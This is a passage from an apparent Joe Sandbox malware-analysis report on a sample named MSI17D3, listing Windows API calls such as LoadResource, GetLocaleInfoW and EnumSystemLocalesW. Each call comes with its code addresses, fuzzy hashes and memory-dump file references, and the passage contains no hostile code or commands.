                                                                                                                                                                                • Opcode Fuzzy Hash: eb2037618105da4f7fb1b4599bbf0e89134fa3a2f1c0ef8076fe2c554ab142d8
                                                                                                                                                                                • Instruction Fuzzy Hash: 4531A374901228ABCB21DF64D9897DDBBB8BF18310F5042EAE51CA7250EB70AF85DF45
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000,665E9022,00000001,00000000,?,00000000,00CF4460,000000FF,?,00CB474D,00CB3778,?,00000000,00000000,?), ref: 00CB45DB
                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,00000000,00CF4460,000000FF,?,00CB474D,00CB3778,?,00000000,00000000,?,?,?,?,00CB3778), ref: 00CB45E6
                                                                                                                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00CF4460,000000FF,?,00CB474D,00CB3778,?,00000000,00000000,?,?,?), ref: 00CB45F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2853612939-0
                                                                                                                                                                                • Opcode ID: a3d8db4b0be02ed134ea94f7df73f8fbc3f44b6d809f9fc4861162a410cba13b
                                                                                                                                                                                • Instruction ID: ee20f00b404339697b526bbe4b47d6113695a80e7df7d5986165d6643e4334f6
                                                                                                                                                                                • Opcode Fuzzy Hash: a3d8db4b0be02ed134ea94f7df73f8fbc3f44b6d809f9fc4861162a410cba13b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E11A332A086549BC7398F59DC44BBBB7BCEB85715F00062AFD2AD3240EB359D00C690
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                • Instruction ID: c5c12caefe9dc288c2c3ac6cc067daa2e456ddf0ee2e95fdcda42333d20d4a54
                                                                                                                                                                                • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                • Instruction Fuzzy Hash: 04F14171E002199FDF14DFA9D9806ADB7B1FF88314F15826EE925AB391D730AE01CB90
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00CE7F64,00000000,00000000,00000000), ref: 00CE7E23
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InformationTimeZone
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 565725191-0
                                                                                                                                                                                • Opcode ID: f82e7a838fd8a97573a65ac3e97e5c5ee31ee5d329326be296343231fa4155cf
                                                                                                                                                                                • Instruction ID: 6b82f2d3bb4fb6e2b90a4045acc5d54f94a5aeb1c7a212b574c86473ed5fbd0a
                                                                                                                                                                                • Opcode Fuzzy Hash: f82e7a838fd8a97573a65ac3e97e5c5ee31ee5d329326be296343231fa4155cf
                                                                                                                                                                                • Instruction Fuzzy Hash: 98D14772D04255ABDB24BBA6DC02ABEB7B9EF04710F204656FA14EB291E7309F41D790
                                                                                                                                                                                APIs
                                                                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CE84B8,?,?,00000008,?,?,00CF14E4,00000000), ref: 00CE86EA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                                                                • Opcode ID: 295d75b22761f0a5c5a490c28f6088becf8068c294a2a05c4adc06d575ee3786
                                                                                                                                                                                • Instruction ID: 3f65ca148bc1fcbd1d068783fa8eeba80e2bc7e40c2b688a808d49b15fb1dbee
                                                                                                                                                                                • Opcode Fuzzy Hash: 295d75b22761f0a5c5a490c28f6088becf8068c294a2a05c4adc06d575ee3786
                                                                                                                                                                                • Instruction Fuzzy Hash: D9B14A32210648CFD715CF29C48AB657BA0FF45364F258658F8AECF2A1CB35EA95CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CD35BF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                                                                • Opcode ID: 3b4c7eba135bcc3c225c1e0991d28fa515da2de8e3bbe29a37a4993dda532057
                                                                                                                                                                                • Instruction ID: adbccbdf3fedf447a3c11bb9d1941d54adb183b3d4d016808a71bc89b89e6d46
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b4c7eba135bcc3c225c1e0991d28fa515da2de8e3bbe29a37a4993dda532057
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F5189B1A11705CBEB25CF99E8857AABBF0FB08344F24816BD519EB350D3749A00CFA1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                • Opcode ID: ebb3cbcfabd6a506fde91db2df849f4eff62bf5dc4774c8feb60728ce4648b9d
                                                                                                                                                                                • Instruction ID: fb526ec7b3223a6c773c5f32fc4acc090ba13cd57f497605f1e0c60ae134bc25
                                                                                                                                                                                • Opcode Fuzzy Hash: ebb3cbcfabd6a506fde91db2df849f4eff62bf5dc4774c8feb60728ce4648b9d
                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1AF70900A46CFCB28CF29C49467EBBB1BF45310F28461BEA6697391D731EE46DB52
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CEE4DE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                • Opcode ID: 11f7469eb82a02df99d4d43b9e73b9f808176f30d7c2c08c9029977dfc0ab93f
                                                                                                                                                                                • Instruction ID: bee57320e1c79d03a09031d926d1597bd8a32fa0c6b9fb08b723ac89465553e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 11f7469eb82a02df99d4d43b9e73b9f808176f30d7c2c08c9029977dfc0ab93f
                                                                                                                                                                                • Instruction Fuzzy Hash: C121C232615286ABDB28AF66DC41ABA73ACEF04358F14417AF916C6241FB34EE04E750
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00CEE237,00000001,00000000,?,-00000050,?,00CEE868,00000000,?,?,?,00000055,?), ref: 00CEE183
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                • Opcode ID: 133672f265895bed8e443d80b0f3d83738cf1fd8df6467082b4d40e2b0f1e8ee
                                                                                                                                                                                • Instruction ID: 7a4292c87bf5baf760826f6e2dcaeda9b06ee8ebe48428566414815e558bc2e9
                                                                                                                                                                                • Opcode Fuzzy Hash: 133672f265895bed8e443d80b0f3d83738cf1fd8df6467082b4d40e2b0f1e8ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 7311293B2007019FDB189F3AC8916BEB791FF84758B19442CE55647A40E3717942CB40
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CEE453,00000000,00000000,?), ref: 00CEE6E5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                • Opcode ID: 779e0999363ad2b0a2373b39db5d43680947eb43a3526c8050af86083d901edf
                                                                                                                                                                                • Instruction ID: 85171c0e8453ba5a04230253f53db42c35d5614db6dc6f25a14d39a4af61cb75
                                                                                                                                                                                • Opcode Fuzzy Hash: 779e0999363ad2b0a2373b39db5d43680947eb43a3526c8050af86083d901edf
                                                                                                                                                                                • Instruction Fuzzy Hash: 22F0CD36600252BBDB285B66CC05BBE7758EB447D4F154424ED16A3180EE74FE41C690
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00CEE48A,00000001,?,?,-00000050,?,00CEE82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00CEE1F6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                • Opcode ID: 2f4133597a1ce30846ba01de9f2c6b891f23512276f67eb91d346551c95db12b
                                                                                                                                                                                • Instruction ID: 2b6b798370ada045519765d35f3d192a23ca554b6b97cea7ff87272d587d5325
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f4133597a1ce30846ba01de9f2c6b891f23512276f67eb91d346551c95db12b
                                                                                                                                                                                • Instruction Fuzzy Hash: BEF08B363003445FCB245F36DC85A7E7B94FF807A8F05842CFA058BA80D2B1AD42DB50
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE1C9A: EnterCriticalSection.KERNEL32(-00D0DE50,?,00CE3576,?,00D0A078,0000000C,00CE3841,?), ref: 00CE1CA9
                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(Function_00037125,00000001,00D0A1D8,0000000C,00CE7554,?), ref: 00CE716A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                • Opcode ID: e985278ebba94df007aa11fa1180b9b3a6fdb9168b7dc581f31d799160424d36
                                                                                                                                                                                • Instruction ID: b3b2bba37a60e4ec14b875966316a39db6ea11620bf21889ae6fbbe82f0eee3e
                                                                                                                                                                                • Opcode Fuzzy Hash: e985278ebba94df007aa11fa1180b9b3a6fdb9168b7dc581f31d799160424d36
                                                                                                                                                                                • Instruction Fuzzy Hash: 09F03772A54340DFD700DF99E846B9C77F0FB48721F108A6AF519DB3A0DB754900AB61
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CE57CC: GetLastError.KERNEL32(?,00000008,00CEAD4C), ref: 00CE57D0
                                                                                                                                                                                  • Part of subcall function 00CE57CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00CE5872
                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00CEE01F,00000001,?,?,?,00CEE88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00CEE0FD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                • Opcode ID: 7b1ec95fd08c56979fa8b08e2b03855a48bd6938baccb9dfa5e575e151184a12
                                                                                                                                                                                • Instruction ID: ca1b928ccbed7497038e99c58a95e0d67ef5a6e57dbd22f4c6d5213cb7f0b088
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b1ec95fd08c56979fa8b08e2b03855a48bd6938baccb9dfa5e575e151184a12
                                                                                                                                                                                • Instruction Fuzzy Hash: D8F02B3A30034597CB04AF36DC4577E7F95EFC17A4F0B4068EB1A8B651C6729982E790
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00CD00E2,00000000,00000000,00000004,00CCED14,00000000,00000004,00CCF127,00000000,00000000), ref: 00CD2410
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                • Opcode ID: f40b0d3550a72510d6debf9c66784bc70ca22021c117f1b9e5bcb0d1461a71c1
                                                                                                                                                                                • Instruction ID: 29715194869f7cae7e5557b95e1e90878711cbaa4e3c47c6853df7a8880cff9e
                                                                                                                                                                                • Opcode Fuzzy Hash: f40b0d3550a72510d6debf9c66784bc70ca22021c117f1b9e5bcb0d1461a71c1
                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0D832694104B6D7154BB99E1FFBE7698D711709F504552EE02D41D1DAA1CB10E161
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00CE4E3F,?,20001004,00000000,00000002,?,?,00CE4441), ref: 00CE76E3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                                                • Opcode ID: fb20c18d3661e4736057b9bb1e9d5f8c278698f5158bf7331f55bef77f647e09
                                                                                                                                                                                • Instruction ID: 5a87a69c16ef240afe0fe5e866fc94acc028474aa7ed06783b940f9a88d4db75
                                                                                                                                                                                • Opcode Fuzzy Hash: fb20c18d3661e4736057b9bb1e9d5f8c278698f5158bf7331f55bef77f647e09
                                                                                                                                                                                • Instruction Fuzzy Hash: BCE04F3250865DBBCF122F62DC09BAE7E2AEF44750F004210FD0565160CB318930EAD6
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0002354B,00CD3077), ref: 00CD3544
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                • Opcode ID: 46112596f0b9b061bda7fce7588a6857482e1c6fb26d8822203db598512fcdef
                                                                                                                                                                                • Instruction ID: 7bc69bc3337b5ed47af49c5da81f9d0ca4d55e97199b062f98202a1d50c8926d
                                                                                                                                                                                • Opcode Fuzzy Hash: 46112596f0b9b061bda7fce7588a6857482e1c6fb26d8822203db598512fcdef
                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CD2C98: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CA3
                                                                                                                                                                                  • Part of subcall function 00CD2C98: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CE0
                                                                                                                                                                                • GetProcessHeap.KERNEL32 ref: 00CB2365
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
